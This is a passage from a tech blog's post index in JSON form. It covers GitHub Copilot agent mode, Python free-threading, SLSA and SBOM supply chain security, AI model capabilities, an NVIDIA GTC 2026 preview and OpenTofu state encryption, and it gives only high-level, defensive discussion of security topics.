demo.\u0026rdquo;\nBut it\u0026rsquo;s a power tool, not a replacement for engineering judgment. The developers who will thrive with agent mode are the ones who can clearly articulate what they want, critically evaluate the output, and know when to take the wheel back. The ones who treat it as a magic box that produces correct code will ship bugs they don\u0026rsquo;t understand.\nGitHub has built something impressive here. The GA release is polished, the VS Code integration is seamless, and the pricing at the existing Copilot tier is reasonable. Just remember: the most important skill in this new world isn\u0026rsquo;t prompting — it\u0026rsquo;s knowing when the machine\u0026rsquo;s answer isn\u0026rsquo;t good enough.\nThis is part of my ongoing AI in Development series, tracking how AI tools are reshaping software engineering practices.\n","date":"26 March 2026","externalUrl":null,"permalink":"/posts/260326-github-copilot-agent-mode/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Copilot’s agent mode is now generally available, promising autonomous multi-step coding. Here’s what works, what doesn’t, and what it means for how we build software.","title":"GitHub Copilot Agent Mode Goes GA — What It Means for Developer Workflows","type":"posts"},{"content":"Python\u0026rsquo;s Global Interpreter Lock — the GIL — has been the subject of more conference talks, blog posts, and heated debates than perhaps any other single feature in programming language history. And now, with Python 3.14 deep in its development cycle, we\u0026rsquo;re seeing the most significant progress toward making the GIL optional that the language has ever achieved.\nI\u0026rsquo;ve been writing Python professionally for over twenty years, and I\u0026rsquo;ll admit that for most of that time, the GIL was a theoretical concern rather than a practical one. But the landscape has changed. As Python becomes the default language for AI/ML workloads, data engineering, and high-throughput web services, the single-threaded limitation is becoming a genuine bottleneck for a growing class of applications. The broader development ecosystem evolution reflects this shift toward languages that prioritize concurrency and parallel execution. This mirrors architectural decisions happening across the tech stack, from JavaScript runtime evolution to Rust\u0026rsquo;s systems programming dominance, where concurrency and parallelism are table stakes.\nWhere We Are in the Free-Threading Journey # Let\u0026rsquo;s get the timeline straight. PEP 703, authored by Sam Gross, proposed making the GIL optional in CPython. It was accepted in 2023 with an incremental implementation plan. Python 3.13, released in October 2024, included the first experimental free-threaded build as an opt-in compilation flag. Python 3.14 is continuing to mature this feature.\nThe current state is that free-threaded CPython builds are available and increasingly functional, but they\u0026rsquo;re still considered experimental. The --disable-gil build flag produces a Python interpreter that can run multiple threads truly concurrently, executing Python bytecode on separate CPU cores simultaneously.\nThis is a fundamental change. In traditional CPython, threading is useful for I/O-bound workloads (waiting for network responses, file operations) but provides no benefit for CPU-bound work because the GIL ensures only one thread executes Python bytecode at a time. Free-threaded Python removes this limitation entirely. This architectural improvement aligns with how other language ecosystems are prioritizing parallelism and concurrency.\nThe Performance Reality # The performance story is more nuanced than \u0026ldquo;remove the GIL, everything gets faster.\u0026rdquo; In fact, the initial free-threaded builds in 3.13 showed a single-threaded performance regression of roughly 5-10% compared to the GIL-enabled build. This overhead comes from the fine-grained locking and atomic operations needed to make CPython\u0026rsquo;s internals thread-safe without a global lock.\nThe Python core team has been working to reduce this overhead in the 3.14 cycle, and the results are encouraging. Recent benchmarks I\u0026rsquo;ve seen on the CPython issue tracker show the single-threaded regression narrowing to the 3-5% range for most workloads, with some benchmarks showing near-parity.\nFor multi-threaded CPU-bound workloads, however, the gains are substantial. A properly parallelized numerical computation can see near-linear scaling across CPU cores — something that was simply impossible with the GIL. In my testing with a Monte Carlo simulation written in pure Python, I saw a 3.7x speedup on a 4-core machine using the free-threaded build with four worker threads. Not quite linear, but dramatically better than the ~1.0x you\u0026rsquo;d get with GIL-enabled CPython.\nThe caveat is important: most real-world Python applications aren\u0026rsquo;t doing pure CPU-bound work in Python. They\u0026rsquo;re calling into C extensions (NumPy, pandas), doing I/O, or running workloads where the GIL isn\u0026rsquo;t the bottleneck. For these applications, the benefit of free-threading ranges from minimal to zero, while the single-threaded overhead is a real cost.\nThe C Extension Challenge # This is where it gets complicated. CPython\u0026rsquo;s enormous ecosystem of C extensions — the very thing that makes Python so powerful for scientific computing and system integration — was built assuming the GIL exists. Many C extensions rely on the GIL for thread safety, either explicitly or (more problematically) implicitly.\nThe Py_GIL_DISABLED build flag triggers a different ABI, and extensions need to be built specifically for free-threaded Python. More importantly, they need to be audited and potentially modified to be thread-safe without the GIL\u0026rsquo;s protection.\nThe major scientific computing libraries are making progress here. NumPy has been working on free-threading compatibility, and many operations that release the GIL internally (which NumPy has done for years for performance) work well. This mirrors how infrastructure and tooling consolidate around performance. But the long tail of smaller C extensions is a different story. If your project depends on a niche C extension that hasn\u0026rsquo;t been updated, free-threaded Python may not be an option for you yet.\nThe Python Packaging Authority (PyPA) has been working on infrastructure to support free-threaded wheels — binary packages built against the free-threaded ABI. This is essential for making the feature practical, because expecting every user to compile extensions from source is a non-starter.\nWhat This Means for Application Architecture # For years, the standard advice for CPU-bound parallelism in Python has been to use multiprocessing instead of threading. This works, but it comes with significant overhead: each process has its own memory space, so data sharing requires serialization (pickle), shared memory, or inter-process communication. For workloads that need to share large data structures, this overhead can negate the parallelism benefits.\nFree-threaded Python opens up a middle path. Threads share memory natively, so you can parallelize CPU-bound work without the serialization overhead of multiprocessing. This is particularly valuable for:\nData processing pipelines where multiple stages need access to shared data structures Web servers handling CPU-intensive request processing (think image processing, PDF generation, or ML inference) Scientific simulations with shared state that would be expensive to serialize Game servers and real-time systems where latency matters and process-based parallelism adds unacceptable overhead The concurrent.futures module works transparently with free-threaded Python — you can switch from ProcessPoolExecutor to ThreadPoolExecutor and potentially see improved performance for CPU-bound tasks without changing your application logic. From an infrastructure perspective, this shift toward better parallelism primitives in cloud and platform design aligns with how modern systems are evolving to better utilize multi-core resources.\nMy Take: Cautious Optimism # I\u0026rsquo;ve lived through enough \u0026ldquo;this changes everything\u0026rdquo; moments in the Python ecosystem to be measured in my enthusiasm. But the free-threading work is genuinely significant, and I\u0026rsquo;m cautiously optimistic about where it\u0026rsquo;s heading.\nMy practical advice: if you\u0026rsquo;re starting a new Python project that has potential CPU-bound parallelism needs, design your code to be thread-safe from the start. Use threading primitives properly, avoid shared mutable state where possible, and structure your code so that it can benefit from free-threading when the feature matures. This discipline mirrors how AI-assisted testing helps catch concurrency issues before they reach production. The same concurrency principles apply across language ecosystems, where runtime improvements and developer tooling work together. Python\u0026rsquo;s tooling consolidation accelerates adoption of new capabilities like free-threading by reducing friction.\nDon\u0026rsquo;t migrate production workloads to free-threaded Python yet — it\u0026rsquo;s still experimental, the ecosystem support is incomplete, and the single-threaded performance regression is real. But do start testing your code against the free-threaded build in CI. Identifying thread-safety issues now is much cheaper than discovering them later.\nThe GIL has been part of Python\u0026rsquo;s identity for over 30 years. Removing it — even optionally — is one of the most ambitious changes the CPython project has ever undertaken. The fact that it\u0026rsquo;s happening incrementally, with careful attention to backwards compatibility and ecosystem impact, gives me confidence that the Python team is approaching it the right way. We\u0026rsquo;re not there yet, but we\u0026rsquo;re closer than we\u0026rsquo;ve ever been.\n","date":"19 March 2026","externalUrl":null,"permalink":"/posts/260319-python-314-free-threading/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.14’s development is pushing free-threading forward. Here’s what the removal of the GIL means practically, and why it matters more than you might think.","title":"Python 3.14 and the Free-Threading Revolution — Is the GIL Finally Behind Us?","type":"posts"},{"content":" Overview # Python has evolved from a general-purpose scripting language into a powerhouse for data science, AI, and systems programming. This series tracks Python\u0026rsquo;s development trajectory through version releases, performance optimizations, type system advances, and the expanding ecosystem of tools and frameworks reshaping the language\u0026rsquo;s identity.\nThe story isn\u0026rsquo;t just about new syntax—it\u0026rsquo;s about how Python maintains backward compatibility while adopting ideas from Rust, Go, and functional programming paradigms.\nWhat You\u0026rsquo;ll Find Here # Language Releases: Analysis of major version changes, including performance improvements via faster CPython, structural pattern matching, and GIL optimization efforts.\nPerformance \u0026amp; Speed: Tracking Python\u0026rsquo;s performance roadmap, JIT compilation experiments, and how tools like PyPy, Mojo, and compiled extensions challenge Python\u0026rsquo;s speed reputation.\nType System Advances: Evolution of type hints, gradual typing adoption, and how Python balances dynamic and static worlds.\nAI \u0026amp; Data Science Boom: How PyTorch, TensorFlow, JAX, and other frameworks have made Python the de facto language for ML engineering and data science.\nEcosystem Maturation: Package management with uv and pip-tools, virtual environments, dependency resolution, and community standardization efforts.\nLearning Path # Understand the performance journey — why Python remains popular despite being slower, and what\u0026rsquo;s being done about it Track the type system evolution — from type hints to gradual adoption and real-world benefits Explore the AI revolution — why Python became the lingua franca of machine learning Follow ecosystem improvements — modern tooling for dependency management and environment management Monitor language proposals — PEPs shaping Python\u0026rsquo;s future Key Technologies Covered # Core Language: CPython, PyPy, GIL, async/await patterns, recent Python versions (3.10+) Type System: Type hints, Pyright, mypy, Pydantic, and gradual typing Data Science: NumPy, Pandas, Polars, scikit-learn, and vectorization techniques AI/ML: PyTorch, TensorFlow, JAX, Hugging Face, and transformer models Performance Tools: Cython, meson, build system improvements, compiled extensions Related Series # Explore complementary areas: AI Models \u0026amp; Releases (foundation models and their Python libraries), Systems \u0026amp; Emerging Languages (languages competing with Python for systems work)\n","date":"19 March 2026","externalUrl":null,"permalink":"/series/python-evolution/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Python Evolution","type":"series"},{"content":"If there\u0026rsquo;s one security topic that has shifted from \u0026ldquo;nice to have\u0026rdquo; to \u0026ldquo;non-negotiable\u0026rdquo; over the past two years, it\u0026rsquo;s software supply chain security. The combination of high-profile attacks (the xz Utils backdoor aftermath and TanStack npm compromise), regulatory pressure, and maturing tooling has created a situation where organizations that aren\u0026rsquo;t thinking about supply chain integrity are falling dangerously behind.\nThis week, I want to dig into where things actually stand with SLSA (Supply-chain Levels for Software Artifacts) and SBOM (Software Bill of Materials) adoption, because the gap between the theoretical frameworks and practical implementation is where most teams struggle.\nThe Regulatory Push Is Real # The US Executive Order on Improving the Nation\u0026rsquo;s Cybersecurity (EO 14028) from 2021 set the wheels in motion, and we\u0026rsquo;re now seeing the downstream effects ripple through the entire industry. Federal agencies have been requiring SBOMs from software vendors, and that requirement is cascading to subcontractors and commercial software providers who want to sell to government customers.\nIn Europe, the Cyber Resilience Act is adding another layer of requirements. Products with digital elements sold in the EU market will need to meet security requirements that include vulnerability handling and — critically — providing SBOMs. The compliance timeline extends through 2027, but organizations are already preparing.\nWhat\u0026rsquo;s changed in the last year is that these aren\u0026rsquo;t just government requirements anymore. I\u0026rsquo;m seeing SBOM requests in commercial procurement processes, enterprise security questionnaires, and even venture capital due diligence for security startups. The market has decided that software transparency isn\u0026rsquo;t optional.\nSLSA: From Framework to Practice # SLSA (pronounced \u0026ldquo;salsa\u0026rdquo;) provides a graduated framework for supply chain security, with levels from 1 to 4 representing increasing security guarantees. When it was first introduced by Google, it felt somewhat academic — a nice framework that would be difficult to implement in practice.\nThat perception has shifted dramatically. The tooling ecosystem around SLSA has matured to the point where achieving Level 2 or even Level 3 compliance is feasible for most organizations with modern CI/CD pipelines.\nAt Level 1, you need to document your build process. At Level 2, you need a hosted build service that generates authenticated provenance — essentially, a signed attestation that says \u0026ldquo;this artifact was produced by this build process from this source code.\u0026rdquo; At Level 3, the build platform itself needs to provide additional hardening and isolation guarantees.\nIn practice, achieving SLSA Level 2 with GitHub Actions has become almost trivial. The SLSA GitHub Generator produces provenance attestations that are verified by the Sigstore ecosystem. For most projects, it\u0026rsquo;s a matter of adding a workflow file and configuring artifact signing. I recently set this up for a client\u0026rsquo;s Node.js project, and the entire implementation took less than a day, including testing.\nLevel 3 is harder, requiring features like isolated build environments and non-falsifiable provenance. But even here, the major CI/CD platforms are adding native support. GitHub\u0026rsquo;s Artifact Attestations feature, which reached GA last year, provides many of the Level 3 guarantees out of the box.\nSBOMs: The Devil Is in the Details # Generating an SBOM is easy. Generating a useful SBOM is hard.\nThe two dominant SBOM formats — SPDX (backed by the Linux Foundation) and CycloneDX (backed by OWASP) — are both mature enough for production use. Tools like Syft, Trivy, and Microsoft\u0026rsquo;s SBOM tool can generate SBOMs from container images, source code repositories, and package manifests with minimal configuration.\nThe challenge is in what you do with the SBOM after generating it. An SBOM sitting in an artifact repository isn\u0026rsquo;t providing security value. The value comes from:\nContinuous vulnerability monitoring. Mapping SBOM components against vulnerability databases (CVE, OSV, GitHub Advisory Database) to identify affected deployments when new vulnerabilities are disclosed. Tools like Grype, Dependency-Track, and Snyk do this, but integrating them into operational workflows — alerting, triage, patching — requires thought.\nLicense compliance. SBOMs contain license information for every dependency, which is critical for organizations with legal requirements around open-source usage. This was always important, but having machine-readable license data makes enforcement practical.\nIncident response. When the next Log4j-scale vulnerability drops, an organization with comprehensive SBOMs can answer \u0026ldquo;are we affected?\u0026rdquo; in minutes rather than days. This alone justifies the investment, in my experience.\nProcurement and vendor assessment. Consuming SBOMs from your vendors and evaluating their dependency choices and update practices. This is the buyer-side benefit that\u0026rsquo;s driving procurement requirements.\nThe Dependency Problem Isn\u0026rsquo;t Going Away # All of this work on supply chain security exists because modern software depends on an enormous graph of third-party components. A typical Node.js application pulls in hundreds of transitive dependencies. A Python data science project might depend on compiled C libraries, Fortran numerical code, and CUDA kernels — each with their own supply chain.\nI\u0026rsquo;ve been doing some analysis of dependency trees in projects I work on, and the numbers are sobering. One mid-sized microservice I maintain has 847 transitive npm dependencies. Of those, about 30% haven\u0026rsquo;t been updated in over a year, and a dozen are maintained by a single individual with no organizational backing. The recent compromises of popular packages demonstrate exactly how vulnerable this situation makes us.\nThis isn\u0026rsquo;t a problem that SBOMs or SLSA solve directly — they make the problem visible, which is the necessary first step. But the underlying issue of critical infrastructure depending on unpaid volunteer maintainers remains one of the most significant risks in our industry. Attacks like Ultralytics supply chain compromise and PyTorch Lightning malware show how quickly threat actors target popular projects.\nInitiatives like the Alpha-Omega Project and the Sovereign Tech Fund are directing funding toward critical open-source projects, which helps. But we\u0026rsquo;re still far from a sustainable model for maintaining the software supply chain that the global economy depends on.\nMy Take: Start Small, but Start Now # If your organization hasn\u0026rsquo;t started implementing supply chain security practices, the good news is that the barrier to entry has never been lower. Here\u0026rsquo;s my practical recommendation:\nWeek one: Add SBOM generation to your CI pipeline. Use Syft or your platform\u0026rsquo;s built-in tool. Store the SBOMs alongside your build artifacts.\nWeek two: Set up Dependency-Track or a similar tool to ingest your SBOMs and monitor for vulnerabilities. Configure alerts for critical and high severity CVEs.\nMonth one: Implement SLSA Level 2 provenance for your most critical artifacts. If you\u0026rsquo;re on GitHub Actions, this is straightforward.\nQuarter one: Review your SBOM data. Identify dependencies with maintenance concerns. Evaluate alternatives for the highest-risk components.\nThis isn\u0026rsquo;t going to make you immune to supply chain attacks — nothing will. But it puts you in a dramatically better position than most organizations, and it satisfies the compliance requirements that are increasingly becoming table stakes for doing business.\nThe direction is clear: software supply chain transparency is becoming mandatory, and the tools to achieve it are ready. The only question is whether you implement it proactively or reactively, and in my experience, proactive is always cheaper.\nCross-Cluster Topics # This supply chain security hub connects to other topic clusters:\nAI + Security: Supply Chain Malware in PyTorch Lightning and EU AI Act compliance discuss how AI infrastructure faces unique supply chain risks Development + Security: TanStack npm compromise covers JavaScript ecosystem vulnerabilities, and xz Utils aftermath provides a comprehensive incident analysis Infrastructure + Security: See the Cloud Next platform engineering hub for how infrastructure teams implement supply chain security at scale ","date":"12 March 2026","externalUrl":null,"permalink":"/posts/260312-supply-chain-security-slsa-adoption/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Supply chain security frameworks like SLSA and SBOM requirements are moving from recommendations to mandates. Here’s what developers need to know about the shifting landscape.","title":"Software Supply Chain Security Gets Serious — SLSA and SBOM Adoption Accelerates","type":"posts"},{"content":"The landscape of AI model capabilities has evolved dramatically in recent years, and the pace of change is accelerating. As developers building AI-powered systems, it\u0026rsquo;s essential to understand the different capabilities available and how they fundamentally change what we can build.\nThe Core Capability Evolution # Understanding how AI models work has become foundational knowledge for any developer. Claude\u0026rsquo;s in-context learning represents a paradigm shift — moving from fine-tuning as the primary customization mechanism to treating prompts and context as the primary tool for teaching models.\nThis shift builds on earlier work in transformer efficiency. The Reformer architecture demonstrated how we could process longer sequences efficiently, and years of progress eventually led to the massive context windows we have today.\nExtended Thinking and Advanced Reasoning # The next frontier moves beyond in-context learning to how models reason over context. Extended thinking models like Claude 3.7 Sonnet introduce deliberate reasoning steps, where the model can think through complex problems before generating responses.\nThis capability pairs beautifully with reasoning-focused models like OpenAI\u0026rsquo;s O3 and O4 Mini, which prioritize deep reasoning over raw speed. These models demonstrate that capability boundaries are moving, and reasoning itself is becoming a first-class feature rather than an emergent property.\nPractical Applications in Development # The model capability improvements translate directly to how developers build systems. AI-assisted testing frameworks leverage these advanced reasoning capabilities to validate code, catch bugs, and ensure correctness without manual intervention.\nMore broadly, AI-powered development tools and GitHub Copilot\u0026rsquo;s agent mode show how these models handle real development workflows. The models aren\u0026rsquo;t just autocompleting code — they\u0026rsquo;re reasoning about architectural decisions and generating multi-step solutions.\nInfrastructure Implications # Supporting these advanced capabilities requires serious infrastructure. Anthropic\u0026rsquo;s compute strategy recognizes that efficiency at scale is itself a competitive advantage. As context windows grow and reasoning becomes more complex, cloud cost optimization becomes critical.\nFor teams deploying these models locally, Docker\u0026rsquo;s Model Runner makes experimentation more accessible. The ability to run and iterate on models locally, then scale to cloud infrastructure, is becoming standard practice.\nOpen Source Models and Alternatives # The proprietary frontier models get most attention, but open-source alternatives continue to mature. Meta\u0026rsquo;s Llama 3.1 release demonstrated that open models can deliver compelling capabilities, and the ecosystem around them continues to improve.\nThe broader AI infrastructure landscape shows how different providers are positioning themselves. Whether you choose open models, API-based services, or hybrid approaches depends on your specific constraints and requirements.\nGovernance and Responsible Development # As model capabilities advance, governance becomes increasingly important. The EU AI Act places specific requirements on general-purpose AI models, and understanding these compliance requirements is essential for teams building with frontier models.\nTeams should also consider how model context protocol adoption and advanced tooling support responsible development practices. Better tooling and standards are making it easier to build systems that are both capable and responsible.\nThe Trajectory Forward # The evolution from ChatGPT\u0026rsquo;s explosive first month through today\u0026rsquo;s reasoning and extended thinking models has been remarkably fast. The pattern we\u0026rsquo;re seeing — rapid capability improvements followed by developer ecosystem maturation — suggests this pace will continue.\nTeams building today have access to an unprecedented toolkit. The question isn\u0026rsquo;t whether to use AI models — it\u0026rsquo;s which models, which capabilities, and what architectural patterns make sense for your specific problem.\nMy Take # We\u0026rsquo;re in the middle of a capability inflection point. The models available today can handle tasks that required specialized training just two years ago. In-context learning eliminated fine-tuning for many use cases. Extended reasoning is eliminating the need for chain-of-thought prompting tricks.\nThe teams that will win are those that understand their models as tools with specific capabilities and limitations, rather than general-purpose solvers. Pair that understanding with thoughtful governance and compliance practices, and you have the foundation for building genuinely valuable AI systems.\nThe next capability frontier is probably already being worked on. Stay curious about what\u0026rsquo;s coming, but focus your energy on what these models can do for your users right now.\n","date":"10 March 2026","externalUrl":null,"permalink":"/posts/260310-ai-llm-models-capabilities-evolution/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Tracking the rapid evolution of AI model capabilities, from in-context learning and extended thinking to reasoning models reshaping development workflows.","title":"AI/LLM Models \u0026 Capabilities — From In-Context Learning to Extended Reasoning","type":"posts"},{"content":"NVIDIA\u0026rsquo;s GTC conference is just around the corner, and the rumor mill is working overtime. After last year\u0026rsquo;s event delivered the Blackwell architecture and a roadmap that had the industry scrambling to keep up, expectations for GTC 2026 are stratospheric. But beyond the keynote theatrics and Jensen Huang\u0026rsquo;s leather jacket, there are real infrastructure implications that developers and platform teams need to think about.\nI\u0026rsquo;ve been tracking NVIDIA\u0026rsquo;s trajectory for a while now, and what strikes me most isn\u0026rsquo;t the raw compute numbers — it\u0026rsquo;s how profoundly the GPU ecosystem is reshaping the entire stack, from data center design to software frameworks to how we think about application architecture.\nThe Blackwell Generation: A Year in Production # Before looking ahead, it\u0026rsquo;s worth taking stock of where we are. The Blackwell GPU architecture has been shipping for several months now, and the real-world performance data is starting to paint a clear picture. The B200 and GB200 configurations have delivered on most of their promises — the second-generation transformer engine with FP4 precision has proven particularly impactful for inference workloads.\nWhat\u0026rsquo;s been most interesting to me, working with teams deploying these systems, is how the NVLink interconnect improvements have changed the game for multi-GPU inference. Running large language models across multiple GPUs used to involve painful compromises around tensor parallelism and pipeline parallelism. The higher-bandwidth NVLink in Blackwell has made these configurations significantly more practical, even for latency-sensitive applications.\nBut here\u0026rsquo;s the thing that doesn\u0026rsquo;t make the marketing slides: the operational complexity of running these systems is substantial. Power requirements, cooling demands, and the expertise needed to optimize workloads for the new architecture represent real costs that go beyond the sticker price of the hardware.\nWhat to Watch for at GTC 2026 # Based on NVIDIA\u0026rsquo;s published roadmap and industry signals, there are several areas I\u0026rsquo;m watching closely.\nNext-generation architecture announcements. NVIDIA has been on an annual cadence for new GPU architectures, and all signs point to a Blackwell successor being unveiled at GTC. The rumored improvements center on further scaling of transformer-specific acceleration, improved memory bandwidth, and potentially new precision formats optimized for emerging model architectures.\nSoftware stack updates. Honestly, this is where I think the most impactful announcements will be for working developers. CUDA continues to evolve, but the higher-level frameworks — TensorRT, Triton Inference Server, NeMo — are where most teams interact with NVIDIA\u0026rsquo;s ecosystem. These improvements align with broader AI infrastructure optimization and observability maturation. Improvements to model optimization, quantization workflows, and multi-model serving could have more practical impact than raw hardware specs.\nNetworking and interconnect. NVIDIA\u0026rsquo;s acquisition of Mellanox continues to pay strategic dividends. The convergence of GPU compute and high-performance networking is enabling new architectures for distributed training and inference. I expect to see announcements around next-generation NVLink and InfiniBand configurations that further blur the line between individual servers and cluster-scale compute.\nEdge and inference-specific hardware. Not everything is about training massive models in hyperscale data centers. There\u0026rsquo;s a growing market for inference at the edge, and NVIDIA\u0026rsquo;s Jetson and DRIVE platforms serve this segment. GTC has historically been where new edge hardware gets announced, and the demand for on-device AI continues to accelerate.\nThe Compute Cost Conversation # Let me step back from the product announcements and talk about something that comes up in virtually every architecture discussion I\u0026rsquo;m involved in: the economics of AI compute.\nNVIDIA\u0026rsquo;s dominance in AI accelerators gives them enormous pricing power. The total cost of ownership for a GPU cluster — including hardware, power, cooling, networking, and the engineering talent to manage it — is staggering. Even with cloud options from AWS, Azure, and GCP, GPU compute remains one of the largest line items in any AI project budget.\nThis is driving several interesting trends. First, there\u0026rsquo;s intense interest in optimization — techniques like quantization, distillation, and speculative decoding that let you do more with less compute. Second, the AMD and Intel alternative accelerator ecosystem is getting more serious attention, not because they\u0026rsquo;ve caught up with NVIDIA on raw performance, but because competition on price-performance could be meaningful for many workloads.\nThird, and this is something I find particularly interesting, there\u0026rsquo;s a growing movement toward designing AI applications that are compute-aware from the start. Rather than training the largest possible model and then trying to make it cheaper to serve, teams are increasingly choosing model architectures and sizes based on their deployment constraints. This is good engineering practice, but it\u0026rsquo;s been driven as much by economics as by principle.\nThe Developer Experience Gap # One area where I think NVIDIA still has significant room for improvement is developer experience. CUDA has been the dominant GPU programming model for over a decade, and it shows — both in terms of ecosystem maturity (positive) and accumulated complexity (negative).\nSetting up a CUDA development environment, debugging GPU kernels, and profiling performance remain harder than they should be in 2026. The tooling has improved — NSight is genuinely useful, and the container-based development workflows have reduced \u0026ldquo;works on my machine\u0026rdquo; problems — but there\u0026rsquo;s still a steep learning curve that limits who can effectively work with GPU-accelerated applications.\nProjects like Triton (the programming language from OpenAI, not NVIDIA\u0026rsquo;s inference server) and JAX have shown that higher-level abstractions over GPU compute are possible without sacrificing too much performance. I\u0026rsquo;d like to see NVIDIA invest more in making their hardware accessible to developers who aren\u0026rsquo;t GPU specialists, because the bottleneck in AI deployment is increasingly human expertise rather than hardware availability.\nMy Take: Beyond the Hype Cycle # GTC has become the de facto annual checkpoint for the AI infrastructure industry, and for good reason — NVIDIA\u0026rsquo;s hardware roadmap effectively defines what\u0026rsquo;s possible for AI workloads in the near term. But I\u0026rsquo;d encourage teams to approach the announcements with a practical lens.\nThe most impactful developments for most organizations won\u0026rsquo;t be the headline-grabbing hardware specs. They\u0026rsquo;ll be the incremental improvements to software frameworks, deployment tools, and optimization techniques that make existing hardware more productive. A 10% improvement in TensorRT\u0026rsquo;s inference optimization is worth more to most teams than a 50% improvement in peak theoretical FLOPS on hardware they won\u0026rsquo;t have access to for months.\nI\u0026rsquo;ll be covering the actual GTC announcements next week once we have concrete details to analyze. For now, the preparation I\u0026rsquo;d recommend is straightforward: audit your current GPU utilization, understand your inference cost structure, and identify the bottlenecks in your AI pipeline. The economic pressures shaping AI deployment decisions apply equally to infrastructure investments. Whatever NVIDIA announces, those fundamentals will determine how much value you can extract from it.\n","date":"5 March 2026","externalUrl":null,"permalink":"/posts/260305-nvidia-gtc-2026-blackwell-ultra/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With NVIDIA’s GTC 2026 around the corner, here’s what developers and infrastructure teams should be watching for in the next generation of AI compute.","title":"GTC 2026 Preview — What NVIDIA's Next Move Means for AI Infrastructure","type":"posts"},{"content":" Overview # Open source powers modern software, yet it operates under unique incentives and challenges. This series explores the human side of open source—how projects are governed, how communities are built, the licensing challenges and battles, sustainability questions, and the infrastructure that underpins millions of developers\u0026rsquo; work.\nUnderstanding these dynamics matters whether you consume open source, contribute to it, or build on top of it.\nWhat You\u0026rsquo;ll Find Here # Project Governance: How successful open source projects organize decision-making, manage maintainers, handle conflicts, and evolve without fragmenting.\nLicensing Battles: Understanding GPL, MIT, Apache 2.0 and new licenses—what each permits, what disputes they\u0026rsquo;ve caused, and how projects navigate licensing complexity.\nCommunity Dynamics: How communities form, attract contributors, onboard newcomers, and maintain health as projects scale.\nSustainability Challenges: The tension between volunteer contributions and maintaining critical infrastructure, funding models, and burnout.\nInfrastructure \u0026amp; Security: Supply chain security in open source, dependency health, and how the ecosystem is raising security baselines.\nMarket Dynamics: Open source monetization, commercial forks, commercial support models, and how companies build businesses around open projects.\nLearning Path # Understand open source culture — the values, incentives, and norms that shape how communities work Navigate licensing effectively — choose appropriate licenses for your projects, understand implications for dependencies Learn governance patterns — how successful projects make decisions and evolve Engage as a contributor — best practices for contributing, understanding community norms, and getting contributions accepted Build sustainable projects — if you maintain open source, understand sustainability, contributor retention, and funding Key Topics Covered # Governance Models: Benevolent dictator, steering committees, meritocracies, and corporate-backed projects Licenses: GPL, AGPL, MIT, Apache 2.0, SSPL, and license compatibility Licensing Issues: GPL enforcement, license creep, dual licensing, and commercial implications Community Building: Contributor onboarding, code of conduct, communication norms, and conflict resolution Sustainability: Funding models, grant programs, sponsorships, and maintainer burnout Infrastructure: Package managers, build systems, CI/CD, and dependency tracking Market Dynamics: Open source vs. SaaS, commercial forks, and business models built on open source Related Series # Explore complementary areas: Supply Chain Security (security implications of open source dependencies), Open Source AI (open development in AI)\n","date":"26 February 2026","externalUrl":null,"permalink":"/series/open-source-chronicles/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Open Source Chronicles","type":"series"},{"content":"It\u0026rsquo;s been about two and a half years since HashiCorp\u0026rsquo;s license change sparked the creation of OpenTofu, and the project has reached an interesting inflection point. What started as a community reaction to the BSL relicense has evolved into a genuinely independent infrastructure-as-code tool with its own roadmap and identity. But maturity brings its own challenges.\nI\u0026rsquo;ve been running OpenTofu alongside Terraform in several projects, and the divergence between the two is now significant enough that the choice between them is no longer just philosophical — it\u0026rsquo;s technical. This aligns with broader cloud FinOps and cost engineering trends where infrastructure-as-code precision directly impacts operational costs.\nThe Fork Has Teeth Now # When OpenTofu first launched under the Linux Foundation\u0026rsquo;s stewardship, skeptics (myself included, to some degree) questioned whether a community fork could maintain the velocity and quality of a commercially-backed project. Those doubts have been largely put to rest.\nOpenTofu has shipped several features that Terraform doesn\u0026rsquo;t have, and vice versa. The most notable OpenTofu additions include client-side state encryption, which addresses a long-standing security concern about sensitive data in state files, and improvements to the provider development experience. These aren\u0026rsquo;t minor features — state encryption alone has been requested by the Terraform community for years.\nOn the other hand, HashiCorp has continued investing in Terraform with features tied more closely to their commercial ecosystem — deeper HCP Terraform integration, improved policy-as-code with Sentinel, and workflow improvements targeted at enterprise teams. The products are serving increasingly different audiences.\nProvider Ecosystem: The Real Battleground # The infrastructure-as-code tool itself is almost secondary to the provider ecosystem. Providers — the plugins that translate HCL configurations into API calls to AWS, Azure, GCP, and hundreds of other services — are where the real value lives. And here, the picture is complicated.\nMost major providers still maintain compatibility with both Terraform and OpenTofu, which makes sense given that the provider protocol hasn\u0026rsquo;t diverged dramatically. The major cloud provider plugins from AWS, Azure, and Google are community-maintained and work with both tools without modification.\nHowever, I\u0026rsquo;m starting to see some provider authors making choices. A few newer providers are being developed OpenTofu-first, taking advantage of OpenTofu-specific registry features. Meanwhile, some HashiCorp partner providers are optimized for Terraform Cloud integration in ways that don\u0026rsquo;t translate perfectly to OpenTofu.\nFor most teams, this isn\u0026rsquo;t a problem yet. But it\u0026rsquo;s a trend worth watching. The \u0026ldquo;write once, run on either\u0026rdquo; era may have an expiration date. The broader infrastructure landscape is also shaped by Kubernetes maturity and cloud platform convergence, which represent alternative approaches to infrastructure provisioning and management.\nState Management: Where OpenTofu Shines # If I had to pick one area where OpenTofu has genuinely leapfrogged Terraform, it\u0026rsquo;s state management. The client-side state encryption feature is a game-changer for organizations with strict compliance requirements.\nIn traditional Terraform workflows, state files contain plaintext representations of your infrastructure, including sensitive values like database passwords, API keys, and certificates. The recommended mitigation has always been to use encrypted remote backends like S3 with SSE-KMS, but that doesn\u0026rsquo;t protect against compromised backend access or insider threats.\nOpenTofu\u0026rsquo;s approach encrypts state data before it leaves the client, using standard encryption schemes. This means your state backend never sees unencrypted sensitive data. I\u0026rsquo;ve deployed this in a financial services project where the compliance team had previously required a custom state management wrapper — OpenTofu\u0026rsquo;s native encryption eliminated that entirely.\nThe implementation is straightforward: you configure an encryption block in your OpenTofu configuration specifying the key provider (AWS KMS, GCP KMS, or a local key), and encryption is applied transparently. State operations work exactly as before from the user\u0026rsquo;s perspective.\nThe Migration Question # Every week, someone asks me whether they should migrate from 